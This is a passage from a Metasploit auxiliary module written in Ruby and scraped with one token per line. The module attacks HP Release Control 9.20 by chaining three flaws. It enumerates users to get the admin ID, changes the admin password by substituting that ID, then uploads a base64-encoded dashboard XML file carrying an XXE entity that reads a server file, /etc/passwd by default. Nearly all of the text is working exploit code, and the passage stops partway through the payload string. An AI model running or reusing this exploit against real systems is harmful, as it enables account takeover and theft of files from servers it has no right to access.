##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require
'msf/core'
class
Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
def
initialize(info = {})
super
(update_info(info,
'Name'
=>
'HP Release Control Authenticated XXE'
,
'Description'
=> %q{
This
module
take advantage of three separate vulnerabilities
in
order to
read an arbitrary text file from the file system with the privileges
of the web server. You must be authenticated, but can be unprivileged
since a privilege escalation vulnerability is used. Tested against
HP
Release Control
9
.
20
.
0000
, Build
395
installed with demo data.
The first vulnerability allows an unprivileged authenticated user to list
the current users, their IDs,
and
even their password hashes. Can't login
with hashes, but the
ID
is useful
in
the second vulnerability.
When a user changes their password, they post the
ID
of the user who
is going to have their password changed. Just replace it with the
admin
ID
and
you change the admin password. You are now admin.
The third vulnerability is an
XXE
in
the dashboard
XML
import mechanism.
This is what allows you to read the file from the file system.
This
module
is
super
ghetto half because it was an
AMF
application,
half because
I
worked on it longer than
I
wanted to.
},
'License'
=>
MSF_LICENSE
,
'Author'
=>
[
'Brandon Perry <bperry.volatile [at] gmail.com>'
],
'References'
=>
[
],
'DisclosureDate'
=>
'May 16 2014'
))
register_options(
[
OptString.
new
(
'TARGETURI'
, [
true
,
"Base directory path"
,
'/'
]),
OptString.
new
(
'FILEPATH'
, [
true
,
"The filepath to read on the server"
,
"/etc/passwd"
]),
OptString.
new
(
'USERNAME'
, [
true
,
"The username to authenticate with"
,
"username"
]),
OptString.
new
(
'PASSWORD'
, [
true
,
"The password to authenticate with"
,
"password"
])
],
self
.
class
)
end
def
check
end
def
run
print_status(
"Authenticating"
)
res = send_request_cgi({
'uri'
=> normalize_uri(target_uri.path)
})
cookie = res.get_cookies
post = {
'j_username'
=> datastore[
'USERNAME'
],
'j_password'
=> datastore[
'PASSWORD'
],
'buttonName'
=>
''
}
res = send_request_cgi({
'uri'
=> normalize_uri(target_uri.path,
'ccm'
,
'j_spring_security_check'
),
'method'
=>
'POST'
,
'vars_post'
=> post,
'cookie'
=> cookie
})
if
res
and
res.headers[
'Location'
] !~ /index.jsp/
fail_with(
"Authentication failed"
)
end
cookie = res.get_cookies
res = send_request_cgi({
'uri'
=> normalize_uri(target_uri.path,
'ccm'
,
'index.jsp'
),
'cookie'
=> cookie
})
cookie = cookie + res.get_cookies
#not sure why this always fails the first time. Whatever.
id =
nil
while
id ==
nil
id = get_admin_id(cookie)
end
print_status(
"Found admin id: "
+ id)
print_status(
"Changing admin's password..."
)
password = change_admin_password(cookie, id)
print_status(
"Changed admin password to: "
+ password)
post = {
'j_username'
=>
'admin'
,
'j_password'
=> password,
'buttonName'
=>
''
}
res = send_request_cgi({
'uri'
=> normalize_uri(target_uri.path)
})
cookie = res.get_cookies
res = send_request_cgi({
'uri'
=> normalize_uri(target_uri.path,
'ccm'
,
'j_spring_security_check'
),
'method'
=>
'POST'
,
'vars_post'
=> post,
'cookie'
=> cookie
})
if
res.headers[
'Location'
] !~ /index.jsp/
fail_with(
"Login failed"
)
end
cookie = res.get_cookies
res = send_request_cgi({
'uri'
=> normalize_uri(target_uri.path,
'ccm'
,
'index.jsp'
),
'cookie'
=> cookie
})
cookie = cookie + res.get_cookies
post = {
'com.mercury.dashboard.screen_resolution_width'
=>
2560
,
'com.mercury.dashboard.arch.fieldtree.date.timeZone'
=>
300
,
'com.mercury.dashboard.arch.fieldtree.date.zeroTimeUser'
=>
1400274351481
}
#need to send this so that the next request doesn't fail
res = send_request_cgi({
'uri'
=> normalize_uri(target_uri.path,
'ccm'
,
'dashboard'
,
'app'
,
'portal'
,
'PageView.jsp'
),
'method'
=>
'POST'
,
'vars_post'
=> post,
'cookie'
=> cookie
})
print_status(
"Exploiting XXE..."
)
data = Rex::Text:
:decode_base64
(
"LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0xNDYyNzA3NjY3MTQ4MjQ1MjA2MDQ2NjQ5OTkyNg0KQ29udGVudC1EaXNwb3NpdGlvbjogZm9ybS1kYXRhOyBuYW1lPSJjb20ubWVyY3VyeS5kYXNoYm9hcmQuYXJjaC5maWVsZHRyZWUuZm9ybUZvckZpZWxkdHJlZS4iDQoNClkNCi0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tMTQ2MjcwNzY2NzE0ODI0NTIwNjA0NjY0OTk5MjYNCkNvbnRlbnQtRGlzcG9zaXRpb246IGZvcm0tZGF0YTsgbmFtZT0iLmltcG9ydEZyb21GaWxlIjsgZmlsZW5hbWU9IkRhc2hib2FyZF9PYmplY3RzX0V4cG9ydF8yMDE0MDUxNC54bWwiDQpDb250ZW50LVR5cGU6IHRleHQveG1sDQoNCjw/eG1sIHZlcnNpb249IjEuMCIgZW5jb2Rpbmc9IlVURi04IiBzdGFuZGFsb25lPSJubyI/Pgo8IURPQ1RZUEUgZm9vIFsKICAgPCFFTEVNRU5UIGZvbyBBTlkgPgogICA8IUVOVElUWSB4eGUgU1lTVEVNICJmaWxlOi8vL2V0Yy9wYXNzd2QiID5dPgo8RXhwb3J0TGlzdCB4bWxuczp4c2k9Imh0dHA6Ly93d3cudzMub3JnLzIwMDEvWE1MU2NoZW1hLWluc3RhbmNlIj48dmVyc2lvbj4yPC92ZXJzaW9uPjxNb2R1bGU+PG5hbWU+UmVsZWFzZSBDb250cm9sIERlZmF1bHQgTW9kdWxlPC9uYW1lPjx1dWlkPjU4NmRjNThhZjQ5ZTJmNGU6ZmY5ODA1OjEwYTYwODEzMDM3Oi03ZmZjPC91dWlkPjxkZXNjcmlwdGlvbj4meHhlOzwvZGVzY3JpcHRpb24+PGVuYWJsZWQ+dHJ1ZTwvZW5hYmxlZD48YWxsb3dTZWxmU2VydmljZT5mYWxzZTwvYWxsb3dTZWxmU2VydmljZT48Y29waWFibGU+dHJ1ZTwvY29waWFibGU+PGFsbFVzZXJzQWNjZXNzPnRydWU8L2FsbFVzZXJzQWNjZXNzPjxwYWdlPjxwYWdlU2VxdWVuY2U+MDwvcGFnZVNlcXVlbmNlPjx0aXRsZT5UcmVuZHM8L3RpdGxlPjxwb3J0bGV0Pjx0aXRsZT5MYXRlbnQgQ2hhbmdlcyBPdmVyIFRpbWU8L3RpdGxlPjxwb3J0bGV0RGVmaW5pdGlvblV1aWQ+M2I3YmI2YWEwMjk3N2Y1Yzo2OTQwMjEwYjoxMTYzYmNiMzk0YTotN2ZkZjwvcG9ydGxldERlZmluaXRpb25VdWlkPjxwcmVmZXJlbmNlVmFsdWU+PG5hbWU+ZGlzcGxheVByZWZTdW1tYXJ5PC9uYW1lPjx2YWx1ZT48c2VxdWVuY2U+MDwvc2VxdWVuY2U+PHZhbHVlPlk8L3ZhbHVlPjwvdmFsdWU+PC9wcmVmZXJlbmNlVmFsdWU+PHByZWZlcmVuY2VWYWx1ZT48bmFtZT5GaWx0ZXI8L25hbWU+PHZhbHVlPjxzZXF1ZW5jZT4wPC9zZXF1ZW5jZT48dmFsdWU+WzI5NDkxOF1bTGF0ZW50XTwvdmFsdWU+PC92YWx1ZT48L3ByZWZlcmVuY2VWYWx1ZT48cHJlZmVyZW5jZVZhbHVlPjxuYW1lPkdyb3VwIEJ5PC9uYW1lPjx2YWx1ZT48c2VxdWVuY2U+MDwvc2VxdWVuY2U+PHZhbHVlPlt3ZWVrXVtXZWVrXTwvdmFsdWU+PC92YWx1ZT48L3ByZWZlcmVuY2VWYWx1ZT48cHJlZmVyZW5jZVZhbHVlPjxuYW1lPmNvbS5tZXJjdXJ5LmRhc2hib2FyZC5hcHAucG9ydGFsLmlzV2lkZVBvcnRsZXQ8L25hbWU+PHZhbHVlPjxzZXF1ZW5jZT4wPC9zZXF1ZW5jZT48dmFsdWU+dHJ1ZTwvdmFsdWU+PC92YWx1ZT48L3ByZWZlcmVuY2VWYWx1ZT48bGF5b3V0Q29sdW1uPjA8L2xheW91dENvbHVtbj48bGF5b3V0Um93PjI8L2xheW91dFJvdz48bGF5b3V0V2lkdGg+MjwvbGF5b3V0V2lkdGg+PGlzTWluaW1pemVkPmZhbHNlPC9pc01pbmltaXplZD48aXNQb3J0bGV0Q29tbT5mYWxzZTwvaXNQb3J0bGV0Q29tbT48L3BvcnRsZXQ+PHBvcnRsZXQ+PHRpdGxlPkFibm9ybWFsIENoYW5nZXMgT3ZlciBUaW1lPC90aXRsZT48cG9ydGxldERlZmluaXRpb25VdWlkPjMyOWM4MTJjNTE3ODNlOWU6NmE5NTIwZjM6MTE2Mzk4MTdkYTI6LTdmZWI8L3BvcnRsZXREZWZpbml0aW9uVXVpZD48cHJlZmVyZW5jZVZhbHVlPjxuYW1lPnBvcnRsZXRFZGl0ZWQ8L25hbWU+PHZhbHVlPjxzZXF1ZW5jZT4wPC9zZXF1ZW5jZT48dmFsdWU+WTwvdmFsdWU+PC92YWx1ZT48L3ByZWZlcmVuY2VWYWx1ZT48cHJlZmVyZW5jZVZhbHVlPjxuYW1lPmRpc3BsYXlQcmVmU3VtbWFyeTwvbmFtZT48dmFsdWU+PHNlcXVlbmNlPjA8L3NlcXVlbmNlPjx2YWx1ZT5ZPC92YWx1ZT48L3ZhbHVlPjwvcHJlZmVyZW5jZVZhbHVlPjxwcmVmZXJlbmNlVmFsdWU+PG5hbWU+RmlsdGVyPC9uYW1lPjx2YWx1ZT48c2VxdWVuY2U+MDwvc2VxdWVuY2U+PHZhbHVlPlsyOTQ5MTJdW0FueV08L3ZhbHVlPjwvdmFsdWU+PC9wcmVmZXJlbmNlVmFsdWU+PHByZWZlcmVuY2VWYWx1ZT48bmFtZT5Hcm91cCBCeTwvbmFtZT48dmFsdWU+PHNlcXVlbmNlPjA8L3NlcXVlbmNlPjx2YWx1ZT5bd2Vla11bV2Vla108L3ZhbHVlPjwvdmFsdWU+PC9wcmVmZXJlbmNlVmFsdWU+PHByZWZlcmVuY2VWYWx1ZT48bmFtZT5jb20ubWVyY3VyeS5kYXNoYm9hcmQuYXBwLnBvcnRhbC5pc1dpZGVQb3J0bGV0PC9uYW1lPjx2YWx1ZT48c2VxdWVuY2U+MDwvc2VxdWVuY2U+PHZhbHVlPnRydWU8L3ZhbHVlPjwvdmFsdWU+PC9wcmVmZXJlbmNlVmFsdWU+PGxheW91dENvbHVtbj4wPC9sYXlvdXRDb2x1bW4+PGxheW91dFJvdz4xPC9sYXlvdXRSb3c+PGxheW91dFdpZHRoPjI8L2xheW91dFdpZHRoPjxpc01pbmltaXplZD5mYWxzZTwvaXNNaW5pbWl6ZWQ+PGlzUG9ydGxldENvbW0+ZmFsc2U8L2lzUG9ydGxldENvbW0+PC9wb3J0bGV0Pjxwb3J0bGV0Pjx0aXRsZT5DaGFuZ2VzIE92ZXIgVGltZTwvdGl0bGU+PHBvcnRsZXREZWZpbml0aW9uVXVpZD4zMjljODEyYzUxNzgzZTllOjZhOTUyMGYzOjExNjM5ODE3ZGEyOi03ZmVjPC9wb3J0bGV0RGVmaW5pdGlvblV1aWQ+PHByZWZlcmVuY2VWYWx1ZT48bmFtZT5wb3J0bGV0RWRpdGVkPC9uYW1lPjx2YWx1ZT48c2VxdWVuY2U+MDwvc2VxdWVuY2U+PHZhbHVlPlk8L3ZhbHVlPjwvdmFsdWU+PC9wcmVmZXJlbmNlVmFsdWU+PHByZWZlcmVuY2VWYWx1ZT48bmFtZT5kaXNwbGF5UHJlZlN1bW1hcnk8L25hbWU+PHZhbHVlPjxzZXF1ZW5jZT4wPC9zZXF1ZW5jZT48dmFsdWU+WTwvdmFsdWU+PC92YWx1ZT48L3ByZWZlcmVuY2VWYWx1ZT48cHJlZmVyZW5jZVZhbHVlPjxuYW1lPkZpbHRlcjwvbmFtZT48dmFsdWU+PHNlcXVlbmNlPjA8L3NlcXVlbmNlPjx2YWx1ZT5bMjk0OTEyXVtBbnldPC92YWx1ZT48L3ZhbHVlPjwvcHJlZmVyZW5jZVZhbHVlPjxwcmVmZXJlbmNlVmFsdWU+PG5hbWU+R3JvdXAgQnk8L25hbWU+PHZhbHVlPjxzZXF1ZW5jZT4wPC9zZXF1ZW5jZT48dmFsdWU+W3dlZWtdW1dlZWtdPC92YWx1ZT48L3ZhbHVlPjwvcHJlZmVyZW5jZVZhbHVlPjxwcmVmZXJlbmNlVmFsdWU+PG5hbWU+Y29tLm1lcmN1cnkuZGFzaGJvYXJkLmFwcC5wb3J0YWwuaXNXaWRlUG9ydGxldDwvbmFtZT48dmFsdWU+PHNlcXVlbmNlPjA8L3NlcXVlbmNlPjx2YWx1ZT50cnVlPC92YWx1ZT48L3ZhbHVlPjwvcHJlZmVyZW5jZVZhbHVlPjxsYXlvdXRDb2x1bW4+MDwvbGF5b3V0Q29sdW1uPjxsYXlvdXRSb3c+MDwvbGF5b3V0Um93PjxsYXlvdXRXaWR0aD4yPC9sYXlvdXRXaWR0aD48aXNNaW5pbWl6ZWQ+ZmFsc2U8L2lzTWluaW1pemVkPjxpc1BvcnRsZXRDb21tPmZhbHNlPC9pc1BvcnRsZXRDb21tPjwvcG9ydGxldD48YXV0b1JlZnJlc2g+ZmFsc2U8L2F1dG9SZWZyZXNoPjxyZWZyZXNoSW50ZXJ2YWw+MDwvcmVmcmVzaEludGVydmFsPjwvcGFnZT48cGFnZT48cGFnZVNlcXVlbmNlPjE8L3BhZ2VTZXF1ZW5jZT48dGl0bGU+QW5hbHlzaXM8L3RpdGxlPjxwb3J0bGV0Pjx0aXRsZT5BcHBsaWNhdGlvbiBTZXZlcml0eSBEaXN0cmlidXRpb248L3RpdGxlPjxwb3J0bGV0RGVmaW5pdGlvblV1aWQ+NTg2ZGM1OGFmNDllMmY0ZTpmZjk4MDU6MTBhNjA4MTMwMzc6LTgwMDA8L3BvcnRsZXREZWZpbml0aW9uVXVpZD48cHJlZmVyZW5jZVZhbHVlPjxuYW1lPmRpc3BsYXlQcmVmU3VtbWFyeTwvbmFtZT48dmFsdWU+PHNlcXVlbmNlPjA8L3NlcXVlbmNlPjx2YWx1ZT5ZPC92YWx1ZT48L3ZhbHVlPjwvcHJlZmVyZW5jZVZhbHVlPjxwcmVmZXJlbmNlVmFsdWU+PG5hbWU+UmVxdWVzdCBTdGF0dXM8L25hbWU+PHZhbHVlPjxzZXF1ZW5jZT4wPC9zZXF1ZW5jZT48dmFsdWU+W1BFTkRJTkdfQVBQUk9WQUxdW1BlbmRpbmcKCQkJCQkJCUFwcHJvdmFsXTwvdmFsdWU+PC92YWx1ZT48L3ByZWZlcmVuY2VWYWx1ZT48cHJlZmVyZW5jZVZhbHVlPjxuYW1lPlVzZXIgQXBwbGljYXRpb25zPC9uYW1lPjx2YWx1ZT48c2VxdWVuY2U+MDwvc2VxdWVuY2U+PHZhbHVlPltZXVtZZXNdPC92YWx1ZT48L3ZhbHVlPjwvcHJlZmVyZW5jZVZhbHVlPjxwcmVmZXJlbmNlVmFsdWU+PG5hbWU+Y29tLm1lcmN1cnkuZGFzaGJvYXJkLmFwcC5wb3J0YWwuaXNXaWRlUG9ydGxldDwvbmFtZT48dmFsdWU+PHNlcXVlbmNlPjA8L3NlcXVlbmNlPjx2YWx1ZT50cnVlPC92YWx1ZT48L3ZhbHVlPjwvcHJlZmVyZW5jZVZhbHVlPjxsYXlvdXRDb2x1bW4+MDwvbGF5b3V0Q29sdW1uPjxsYXlvdXRSb3c+MDwvbGF5b3V0Um93PjxsYXlvdXRXaWR0aD4yPC9sYXlvdXRXaWR0aD48aXNNaW5pbWl6ZWQ+ZmFsc2U8L2lzTWluaW1pemVkPjxpc1BvcnRsZXRDb21tPmZhbHNlPC9pc1BvcnRsZXRDb21tPjwvcG9ydGxldD48cG9ydGxldD48dGl0bGU+Q2hhbmdlIFJlcXVlc3QgSW1wYWN0IEFuYWx5c2lzIFJhdGlvPC90aXRsZT48cG9ydGxldERlZmluaXRpb25VdWlkPjU4NmRjNThhZjQ5ZTJmNGU6ZmY5ODA1OjEwYTYwODEzMDM3Oi03ZmZlPC9wb3J0bGV0RGVmaW5pdGlvblV1aWQ+PHByZWZlcmVuY2VWYWx1ZT48bmFtZT5kaXNwbGF5UHJlZlN1bW1hcnk8L25hbWU+PHZhbHVlPjxzZXF1ZW5jZT4wPC9zZXF1ZW5jZT48dmFsdWU+WTwvdmFsdWU+PC92YWx1ZT48L3ByZWZlcmVuY2VWYWx1ZT48cHJlZmVyZW5jZVZhbHVlPjxuYW1lPlJlcXVlc3QgU3RhdHVzPC9uYW1lPjx2YWx1ZT48c2VxdWVuY2U+MDwvc2VxdWVuY2U+PHZhbHVlPltQRU5ESU5HX0FQUFJPVkFMXVtQZW5kaW5nCgkJCQkJCQlBcHByb3ZhbF08L3ZhbHVlPjwvdmFsdWU+PC9wcmVmZXJlbmNlVmFsdWU+PHByZWZlcmVuY2VWYWx1ZT48bmFtZT5jb20ubWVyY3VyeS5kYXNoYm9hcmQuYXBwLnBvcnRhbC5pc1dpZGVQb3J0bGV0PC9uYW1lPjx2YWx1ZT48c2VxdWVuY2U+MDwvc2VxdWVuY2U+PHZhbHVlPnRydWU8L3ZhbHVlPjwvdmFsdWU+PC9wcmVmZXJlbmNlVmFsdWU+PGxheW91dENvbHVtbj4wPC9sYXlvdXRDb2x1bW4+PGxheW91dFJvdz4yPC9sYXlvdXRSb3c+PGxheW91dFdpZHRoPjI8L2xheW91dFdpZHRoPjxpc01pbmltaXplZD5mYWxzZTwvaXNNaW5pbWl6ZWQ+PGlzUG9ydGxldENvbW0+ZmFsc2U8L2lzUG9ydGxldENvbW0+PC9wb3J0bGV0Pjxwb3J0bGV0Pjx0aXRsZT5BcHBsaWNhdGlvbiBTdGF0dXMgRGlzdHJpYnV0aW9uPC90aXRsZT48cG9ydGxldERlZmluaXRpb25VdWlkPjU4NmRjNThhZjQ5ZTJmNGU6ZmY5ODA1OjEwYTYwODEzMDM3Oi03ZmZmPC9wb3J0bGV0RGVmaW5pdGlvblV1aWQ+PHByZWZlcmVuY2VWYWx1ZT48bmFtZT5kaXNwbGF5UHJlZlN1bW1hcnk8L25hbWU+PHZhbHVlPjxzZXF1ZW5jZT4wPC9zZXF1ZW5jZT48dmFsdWU+WTwvdmFsdWU+PC92YWx1ZT48L3ByZWZlcmVuY2VWYWx1ZT48cHJlZmVyZW5jZVZhbHVlPjxuYW1lPlVzZXIgQXBwbGljYXRpb25zPC9uYW1lPjx2YWx1ZT48c2VxdWVuY2U+MDwvc2VxdWVuY2U+PHZhbHVlPltZXVtZZXNdPC92YWx1ZT48L3ZhbHVlPjwvcHJlZmVyZW5jZVZhbHVlPjxwcmVmZXJlbmNlVmFsdWU+PG5hbWU+VGltZSBGcmFtZTwvbmFtZT48dmFsdWU+PHNlcXVlbmNlPjA8L3NlcXVlbmNlPjx2YWx1ZT5bTGFzdCBNb250aF1bTGFzdCBNb250aF08L3ZhbHVlPjwvdmFsdWU+PC9wcmVmZXJlbmNlVmFsdWU+PHByZWZlcmVuY2VWYWx1ZT48bmFtZT5jb20ubWVyY3VyeS5kYXNoYm9hcmQuYXBwLnBvcnRhbC5pc1dpZGVQb3J0bGV0PC9uYW1lPjx2YWx1ZT48c2VxdWVuY2U+MDwvc2VxdWVuY2U+PHZhbHVlPnRydWU8L3ZhbHVlPjwvdmFsdWU+PC9wcmVmZXJlbmNlVmFsdWU+PGxheW91dENvbHVtbj4wPC9sYXlvdXRDb2x1bW4+PGxheW91dFJvdz4xPC9sYXlvdXRSb3c+PGxheW91dFdpZHRoPjI8L2xheW91dFdpZHRoPjxpc01pbmltaXplZD5mYWxzZTwvaXNNaW5pbWl6ZWQ+PGlzUG9ydGxldENvbW0+ZmFsc2U8L2lzUG9ydGxldENvbW0+PC9wb3J0bGV0PjxhdXRvUmVmcmVzaD5mYWxzZTwvYXV0b1JlZnJlc2g+PHJlZnJlc2hJbnRlcnZhbD4wPC9yZWZyZXNoSW50ZXJ2YWw+PC9wYWdlPjxwYWdlPjxwYWdlU2VxdWVuY2U+MjwvcGFnZVNlcXVlbmNlPjx0aXRsZT5Qb3N0IEltcGxlbWVudGF0aW9uPC90aXRsZT48cG9ydGxldD48dGl0bGU+T3V0Y29tZSBPdmVyIFRpbWU8L3RpdGxlPjxwb3J0bGV0RGVmaW5pdGlvblV1aWQ+NmEzNjczYzlmZWI3NmRjYjotMzYyNTYxNjY6MTE3MmIyOTE1YTI6LTdmZjQ8L3BvcnRsZXREZWZpbml0aW9uVXVpZD48cHJlZmVyZW5jZVZhbHVlPjxuYW1lPnBvcnRsZXRFZGl0ZWQ8L25hbWU+PHZhbHVlPjxzZXF1ZW5jZT4wPC9zZXF1ZW5jZT48dmFsdWU+WTwvdmFsdWU+PC92YWx1ZT48L3ByZWZlcmVuY2VWYWx1ZT48cHJlZmVyZW5jZVZhbHVlPjxuYW1lPmRpc3BsYXlQcmVmU3VtbWFyeTwvbmFtZT48dmFsdWU+PHNlcXVlbmNlPjA8L3NlcXVlbmNlPjx2YWx1ZT5ZPC92YWx1ZT48L3ZhbHVlPjwvcHJlZmVyZW5jZVZhbHVlPjxwcmVmZXJlbmNlVmFsdWU+PG5hbWU+RmlsdGVyPC9uYW1lPjx2YWx1ZT48c2VxdWVuY2U+MDwvc2VxdWVuY2U+PHZhbHVlPlsyOTQ5MjBdW0Nsb3NlZF08L3ZhbHVlPjwvdmFsdWU+PC9wcmVmZXJlbmNlVmFsdWU+PHByZWZlcmVuY2VWYWx1ZT48bmFtZT5Hcm91cCBCeTwvbmFtZT48dmFsdWU+PHNlcXVlbmNlPjA8L3NlcXVlbmNlPjx2YWx1ZT5bd2Vla11bV2Vla108L3ZhbHVlPjwvdmFsdWU+PC9wcmVmZXJlbmNlVmFsdWU+PHByZWZlcmVuY2VWYWx1ZT48bmFtZT5jb20ubWVyY3VyeS5kYXNoYm9hcmQuYXBwLnBvcnRhbC5pc1dpZGVQb3J0bGV0PC9uYW1lPjx2YWx1ZT48c2VxdWVuY2U+MDwvc2VxdWVuY2U+PHZhbHVlPnRydWU8L3ZhbHVlPjwvdmFsdWU+PC9wcmVmZXJlbmNlVmFsdWU+PGxheW91dENvbHVtbj4wPC9sYXlvdXRDb2x1bW4+PGxheW91dFJvdz4wPC9sYXlvdXRSb3c+PGxheW91dFdpZHRoPjI8L2xheW91dFdpZHRoPjxpc01pbmltaXplZD5mYWxzZTwvaXNNaW5pbWl6ZWQ+PGlzUG9ydGxldENvbW0+ZmFsc2U8L2lzUG9ydGxldENvbW0+PC9wb3J0bGV0Pjxwb3J0bGV0Pjx0aXRsZT5PdXRjb21lIEdyb3VwZWQgQnkgUmlzazwvdGl0bGU+PHBvcnRsZXREZWZpbml0aW9uVXVpZD42YTM2NzNjOWZlYjc2ZGNiOi01MTk3MDhjYzoxMTcyYmE1NzllZDotN2ZmMTwvcG9ydGxldERlZmluaXRpb25VdWlkPjxwcmVmZXJlbmNlVmFsdWU+PG5hbWU+cG9ydGxldEVkaXRlZDwvbmFtZT48dmFsdWU+PHNlcXVlbmNlPjA8L3NlcXVlbmNlPjx2YWx1ZT5ZPC92YWx1ZT48L3ZhbHVlPjwvcHJlZmVyZW5jZVZhbHVlPjxwcmVmZXJlbmNlVmFsdWU+PG5hbWU+ZGlzcGxheVByZWZTdW1tYXJ5PC9uYW1lPjx2YWx1ZT48c2VxdWVuY2U+MDwvc2VxdWVuY2U+PHZhbHVlPlk8L3ZhbHVlPjwvdmFsdWU+PC9wcmVmZXJlbmNlVmFsdWU+PHByZWZlcmVuY2VWYWx1ZT48bmFtZT5GaWx0ZXI8L25hbWU+PHZhbHVlPjxzZXF1ZW5jZT4wPC9zZXF1ZW5jZT48dmFsdWU+WzI5NDkyMF1bQ2xvc2VkXTwvdmFsdWU+PC92YWx1ZT48L3ByZWZlcmVuY2VWYWx1ZT48cHJlZmVyZW5jZVZhbHVlPjxuYW1lPk1pbmltdW4gVmFsdWU8L25hbWU+PHZhbHVlPjxzZXF1ZW5jZT4wPC9zZXF1ZW5jZT48dmFsdWU+WzBdW108L3ZhbHVlPjwvdmFsdWU+PC9wcmVmZXJlbmNlVmFsdWU+PHByZWZlcmVuY2VWYWx1ZT48bmFtZT5JbnRlcnZhbDwvbmFtZT48dmFsdWU+PHNlcXVlbmNlPjA8L3NlcXVlbmNlPjx2YWx1ZT5bMTBdW108L3ZhbHVlPjwvdmFsdWU+PC9wcmVmZXJlbmNlVmFsdWU+PHByZWZlcmVuY2VWYWx1ZT48bmFtZT5NYXhpbXVtIFZhbHVlPC9uYW1lPjx2YWx1ZT48c2VxdWVuY2U+MDwvc2VxdWVuY2U+PHZhbHVlPlsxMDBdW108L3ZhbHVlPjwvdmFsdWU+PC9wcmVmZXJlbmNlVmFsdWU+PHByZWZlcmVuY2VWYWx1ZT48bmFtZT5OdW1lcmljIFR5cGU8L25hbWU+PHZhbHVlPjxzZXF1ZW5jZT4wPC9zZXF1ZW5jZT48dmFsdWU+W2NhbGN1bGF0ZWQtcmlza11bY2FsY3VsYXRlZC1yaXNrXTwvdmFsdWU+PC92YWx1ZT48L3ByZWZlcmVuY2VWYWx1ZT48cHJlZmVyZW5jZVZhbHVlPjxuYW1lPmNvbS5tZXJjdXJ5LmRhc2hib2FyZC5hcHAucG9ydGFsLmlzV2lkZVBvcnRsZXQ8L25hbWU+PHZhbHVlPjxzZXF1ZW5jZT4wPC9zZXF1ZW5jZT48dmFsdWU+dHJ1ZTwvdmFsdWU+PC92YWx1ZT48L3ByZWZlcmVuY2VWYWx1ZT48bGF5b3V0Q29sdW1uPjA8L2xheW91dENvbHVtbj48bGF5b3V0Um93PjE8L2xheW91dFJvdz48bGF5b3V0V2lkdGg+MjwvbGF5b3V0V2lkdGg+PGlzTWluaW1pemVkPmZhbHNlPC9pc01pbmltaXplZD48aXNQb3J0bGV0Q29tbT5mYWxzZTwvaXNQb3J0bGV0Q29tbT48L3BvcnRsZXQ+PGF1dG9SZWZyZXNoPmZhbHNlPC9hdXRvUmVmcmVzaD48cmVmcmVzaEludGVydmFsPjA8L3JlZnJlc2hJbnRlcnZhbD48L3BhZ2U+PC9Nb2R1bGU+PFBvcnRsZXREZWZpbml0aW9uPjxCYXJDaGFydFBvcnRsZXREZWZpbml0aW9uPjxDaGFydFBvcnRsZXREZWZpbml0aW9uPjxCdWlsZGVyUG9ydGxldERlZmluaXRpb24+PGRhdGFTb3VyY2U+PGlkPkNIQU5HRV9JTVBBQ1RfQU5BTFlTSVNfUkFUSU88L2lkPjxuYW1lPkNoYW5nZSBSZXF1ZXN0IEltcGFjdCBBbmFseXNpcyBSYXRpbzwvbmFtZT48L2RhdGFTb3VyY2U+PHByZWZlcmVuY2VTdW1tYXJ5U2hvd24+dHJ1ZTwvcHJlZmVyZW5jZVN1bW1hcnlTaG93bj48cmVxdWlyZUVkaXRCZWZvcmVGaXJzdFZpZXc+ZmFsc2U8L3JlcXVpcmVFZGl0QmVmb3JlRmlyc3RWaWV3PjxoZWxwVGV4dC8+PHByZWZlcmVuY2U+PG5hbWU+UmVxdWVzdCBTdGF0dXM8L25hbWU+PHR5cGU+ZHJvcGRvd248L3R5cGU+PHByb21wdD5SZXF1ZXN0IFN0YXR1czwvcHJvbXB0PjxsYXlvdXRSb3c+MDwvbGF5b3V0Um93PjxsYXlvdXRDb2x1bW4+MDwvbGF5b3V0Q29sdW1uPjxsYXlvdXRXaWR0aD4xPC9sYXlvdXRXaWR0aD48ZGVmYXVsdFZhbHVlPltQRU5ESU5HX0FQUFJPVkFMXVtQZW5kaW5nCgkJCQkJCQlBcHByb3ZhbF08L2RlZmF1bHRWYWx1ZT48ZGlzcGxheU9wdGlvbj5yZXF1aXJlZEVkaXRhYmxlUHJlZjwvZGlzcGxheU9wdGlvbj48L3ByZWZlcmVuY2U+PC9CdWlsZGVyUG9ydGxldERlZmluaXRpb24+PGNoYXJ0VGl0bGU+ZGVmd2FmZHNhZmRzYTwvY2hhcnRUaXRsZT48Y29sb3JTb3VyY2U+U3RhdHVzIENvbG9yPC9jb2xvclNvdXJjZT48dG9vbHRpcFNvdXJjZT4jIFJlcXVlc3RzPC90b29sdGlwU291cmNlPjx0b29sdGlwQ29udGFpbnNIVE1MPmZhbHNlPC90b29sdGlwQ29udGFpbnNIVE1MPjxvcmllbnRhdGlvbj52ZXJ0aWNhbDwvb3JpZW50YXRpb24+PGh5cGVybGluaz48aHlwZXJsaW5rVHlwZT5ub0h5cGVybGluazwvaHlwZXJsaW5rVHlwZT48aHlwZXJsaW5rU291cmNlLz48L2h5cGVybGluaz48L0NoYXJ0UG9ydGxldERlZmluaXRpb24+PGJhck5hbWVTb3VyY2U+U3RhdHVzPC9iYXJOYW1lU291cmNlPjxiYXJBeGlzTGFiZWw+U3RhdHVzPC9iYXJBeGlzTGFiZWw+PHZhbHVlU291cmNlPiMgUmVxdWVzdHM8L3ZhbHVlU291cmNlPjx2YWx1ZUF4aXNMYWJlbD4jIFJlcXVlc3RzPC92YWx1ZUF4aXNMYWJlbD48L0JhckNoYXJ0UG9ydGxldERlZmluaXRpb24+PHR5cGU+QmFyQ2hhcnQ8L3R5cGU+PG5hbWU+Q2hhbmdlIFJlcXVlc3QgSW1wYWN0IEFuYWx5c2lzIFJhdGlvPC9uYW1lPjx1dWlkPjU4NmRjNThhZjQ5ZTJmNGU6ZmY5ODA1OjEwYTYwODEzMDM3Oi03ZmZlPC91dWlkPjxkZXNjcmlwdGlvbi8+PHRpbWVvdXQ+MjA8L3RpbWVvdXQ+PGRlZmF1bHRXaWR0aD4xPC9kZWZhdWx0V2lkdGg+PGVuYWJsZWQ+dHJ1ZTwvZW5hYmxlZD48ZXhwb3J0QXNXU1JQPnRydWU8L2V4cG9ydEFzV1NSUD48c3VwcG9ydERyaWxsVG8+dHJ1ZTwvc3VwcG9ydERyaWxsVG8+PHBvcnRsZXRDb21tU3VwPmZhbHNlPC9wb3J0bGV0Q29tbVN1cD48